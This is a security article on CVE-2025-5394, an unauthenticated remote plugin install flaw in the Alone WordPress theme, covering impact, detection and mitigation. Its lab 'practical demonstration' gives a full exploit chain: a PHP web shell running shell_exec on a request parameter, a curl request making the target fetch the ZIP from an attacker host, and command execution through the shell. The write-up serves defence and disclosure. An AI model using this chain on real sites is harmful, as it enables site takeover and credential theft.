Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install (CVE-2025-5394)

Threat actors are actively exploiting a critical security flaw in "Alone – Charity Multipurpose Non-profit WordPress Theme" to take over susceptible sites.

The vulnerability, tracked as CVE-2025-5394, carries a CVSS score of 9.8. Security researcher Thái An has been credited with discovering and reporting the bug.

According to Wordfence, the shortcoming is an arbitrary file upload affecting all versions of the theme up to and including 7.8.3. It was addressed in version 7.8.5, released on June 16, 2025.

CVE-2025-5394 is rooted in a plugin installation function named "alone_import_pack_install_plugin()" and stems from a missing capability check, thereby allowing unauthenticated users to deploy arbitrary plugins from remote sources via AJAX and achieve code execution.

"This vulnerability makes it possible for an unauthenticated attacker to upload arbitrary files to a vulnerable site and achieve remote code execution, which is typically leveraged for a complete site takeover," Wordfence's István Márton said.

Evidence shows that CVE-2025-5394 began to be exploited starting July 12, two days before the vulnerability was publicly disclosed. This indicates that the threat actors behind the campaign may have been actively monitoring code changes for any newly addressed vulnerabilities.

Technical details

The vulnerability stems from a missing capability check in the alone_import_pack_install_plugin() function. Because the handler never verifies who is calling it, an unauthenticated attacker can make the site fetch a ZIP file from a remote location and install it as a plugin; the ZIP contains a PHP web shell disguised as a plugin. The vulnerability has been assigned a CVSS v3.1 base score of 9.8 (Critical) with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H: reachable over the network, low attack complexity, no privileges or user interaction required, and high impact on confidentiality, integrity and availability. The weakness is classified as CWE-862 (Missing Authorization).

Practical Demonstration of CVE-2025-5394

1. Set Up a Vulnerable Lab Environment

  • Server: Use a local VM (e.g., Ubuntu 22.04 with LAMP stack) or Docker.

  • Install WordPress (version 6.x, default install is fine).

  • Download Alone Theme ≤ 7.8.3 (vulnerable version).

  • Install and activate the theme on your WordPress instance.

  • Disable firewalls/IDS inside the lab so test payloads aren't blocked, and keep the VM on an isolated network: once exploited it is running a web shell.

2. Identify the Vulnerable Function

The issue lies in the AJAX handler. Stripped down to the parts that matter, it looks like this:

```php
// Registered for unauthenticated requests through the wp_ajax_nopriv_ hook,
// so the handler is reachable via /wp-admin/admin-ajax.php without any session.
add_action( 'wp_ajax_nopriv_alone_import_pack_install_plugin', 'alone_import_pack_install_plugin' );

function alone_import_pack_install_plugin() {
    // Missing capability check: no current_user_can( 'install_plugins' ), no nonce check
    // Accepts a remote plugin package URL and installs it
}
```

Because it neither checks a capability (current_user_can()) nor a nonce, and is hooked for logged-out users, anyone who can reach admin-ajax.php can call it.
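As an added example (not the theme's code and not from this post's author): a reconstruction of the vulnerable handler shape described above, placed beside a hardened version so the missing checks are visible side by side. The POST parameter name plugin_url, the nonce action name and the allow-listed download host are assumptions made for the example; the real theme's parameter name must be read from its own source.

```php
<?php
// Added example: reconstruction of the vulnerable handler shape beside a hardened one.
// Assumptions: the package URL arrives in $_POST['plugin_url']; nonce action and
// allow-list host are placeholders.

// --- Vulnerable shape (CVE-2025-5394 as described in the write-up) ---
// Hooked for both logged-in and anonymous callers, and the handler never asks who is calling.
add_action( 'wp_ajax_alone_import_pack_install_plugin',        'alone_import_pack_install_plugin' );
add_action( 'wp_ajax_nopriv_alone_import_pack_install_plugin', 'alone_import_pack_install_plugin' );

function alone_import_pack_install_plugin() {
    $package = isset( $_POST['plugin_url'] ) ? $_POST['plugin_url'] : '';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    // Downloads an arbitrary ZIP from an attacker-chosen URL and unpacks it into wp-content/plugins/
    $upgrader->install( $package );
    wp_send_json_success();
}

// --- Hardened shape ---
// 1. no nopriv hook: anonymous requests never reach the handler
// 2. nonce check: blocks CSRF against a logged-in administrator
// 3. capability check: only users allowed to install plugins may proceed
// 4. allow-list: only HTTPS packages from a known host, never an arbitrary URL
add_action( 'wp_ajax_alone_import_pack_install_plugin', 'alone_import_pack_install_plugin_safe' );

function alone_import_pack_install_plugin_safe() {
    check_ajax_referer( 'alone_import_pack', 'nonce' ); // nonce action name is an assumption

    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    $package = isset( $_POST['plugin_url'] ) ? esc_url_raw( wp_unslash( $_POST['plugin_url'] ) ) : '';
    $scheme  = wp_parse_url( $package, PHP_URL_SCHEME );
    $host    = wp_parse_url( $package, PHP_URL_HOST );
    $allowed = array( 'downloads.wordpress.org' ); // placeholder allow-list; a vendor would list its own CDN

    if ( 'https' !== $scheme || ! in_array( $host, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'Package source not allowed' ), 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $package );

    if ( is_wp_error( $result ) || ! $result ) {
        wp_send_json_error( array( 'message' => 'Install failed' ), 500 );
    }
    wp_send_json_success();
}
```

The order of the checks is deliberate: the nonce and capability checks run before any user-supplied value is touched, and the allow-list is evaluated before WordPress is asked to download anything, so an attacker-controlled URL never reaches the upgrader.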

3. Exploit Flow (High-Level)

  1. Attacker crafts a malicious plugin ZIP containing a PHP web shell and hosts it on a server the target can reach.

  2. Attacker sends an unauthenticated request to /wp-admin/admin-ajax.php with action=alone_import_pack_install_plugin and the URL of the ZIP.

  3. WordPress downloads the ZIP from the attacker's server and unpacks it into wp-content/plugins/.

  4. Attacker gains remote code execution by requesting the web shell file directly. The plugin does not need to be activated: the PHP file is executed by the web server on direct access because it does not depend on WordPress being loaded.

4. Build a Malicious Plugin

Create a ZIP file called evil-plugin.zip containing a single file, evil-plugin.php:

```php
<?php
/*
Plugin Name: Evil Plugin
*/

// Deliberately vulnerable lab web shell: runs whatever arrives in the cmd parameter.
if ( isset( $_REQUEST['cmd'] ) ) {
    echo "<pre>" . shell_exec( $_REQUEST['cmd'] ) . "</pre>";
}
```

Zip it (wrapping the file in a directory makes the install path predictable, since WordPress uses the ZIP's top-level directory as the plugin directory name):

```bash
mkdir evil-plugin
mv evil-plugin.php evil-plugin/
zip -r evil-plugin.zip evil-plugin
```

Host it on a simple HTTP server:

```bash
python3 -m http.server 8000
```

5. Trigger the Exploit

Send the AJAX request (unauthenticated) to install your malicious plugin. The name of the parameter that carries the package URL (plugin_url below) must be taken from the vulnerable function in your lab copy of the theme; adjust it if the handler reads a different field:

```bash
curl -X POST "http://targetsite.com/wp-admin/admin-ajax.php" \
  -d "action=alone_import_pack_install_plugin" \
  -d "plugin_url=http://attacker-ip:8000/evil-plugin.zip"
```

6. Gain Remote Code Execution

After success, access the plugin endpoint (adjust the path if WordPress unpacked the ZIP under a different directory name):

```bash
curl "http://targetsite.com/wp-content/plugins/evil-plugin/evil-plugin.php?cmd=whoami"
```

You should see the result of the command executed on the target server, running as the web server user.

7. Cleanup

After testing, remove the malicious plugin:

  • Delete wp-content/plugins/evil-plugin from the lab site.

  • Revert the WordPress VM or container snapshot to its pre-exploit state rather than trusting a manual cleanup.

Impact

The vulnerability allows attackers to achieve remote code execution on affected WordPress sites. This can lead to complete site compromise, as attackers can upload and execute malicious code through web shells disguised as legitimate plugins. Code running as the web server user can read wp-config.php and the database credentials in it, create administrator accounts, and modify any file the web server can write, so unauthorized access, data theft and persistent backdoors all follow from a single request.

Mitigation and workarounds

Website administrators running the Alone theme should immediately update to version 7.8.5 or later, which contains the security fix. The theme developers have addressed this vulnerability in their latest release, available through ThemeForest. Check the installed version against the Version: header in the theme's style.css rather than trusting the dashboard alone.

Because exploitation started before public disclosure, updating is not enough on its own. Review wp-content/plugins/ for directories you did not install and compare file modification times against your last legitimate change. Note that the exploit sends the action name in the POST body, so it will only appear in access logs when an attacker passes it in the query string; unexplained POST requests to admin-ajax.php from unknown IPs around the exploitation window are the more reliable signal.

If the update cannot be applied straight away, block the vulnerable AJAX action for unauthenticated callers at the WAF or, where no WAF is available, with a must-use plugin.
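The following must-use plugin is an added example (not vendor code and not from this post's author) of such a virtual patch. It assumes the theme registers the action with WordPress's default hook priority of 10, so a callback at priority -100 runs first, and that the theme also exposes the action on the authenticated wp_ajax_ hook; both are assumptions to verify against your copy of the theme.

```php
<?php
/*
Plugin Name: Virtual patch for CVE-2025-5394 (added example, not vendor code)
Description: Drop into wp-content/mu-plugins/ on a site that cannot update the Alone theme immediately.
*/

// Refuse the vulnerable AJAX action for anonymous callers before the theme's own
// callback runs. Priority -100 orders this ahead of the theme's registration
// (assumed to use the default priority 10); wp_send_json_error() ends the request,
// so the theme's handler is never reached.
add_action( 'wp_ajax_nopriv_alone_import_pack_install_plugin', function () {
    $ip = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
    error_log( 'CVE-2025-5394: blocked unauthenticated alone_import_pack_install_plugin call from ' . $ip );
    wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
}, -100 );

// For logged-in callers, enforce the capability the handler should have checked.
// Assumption: the theme also registers the action on the authenticated wp_ajax_ hook.
add_action( 'wp_ajax_alone_import_pack_install_plugin', function () {
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }
}, -100 );
```

Must-use plugins load before the active theme, so the callbacks above are registered before the theme's; WordPress sorts callbacks by priority when the action fires, which is why the negative priority is what guarantees ordering, not load order. The error_log() line doubles as a detection source while the workaround is in place.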

Written by sm_defencerabbit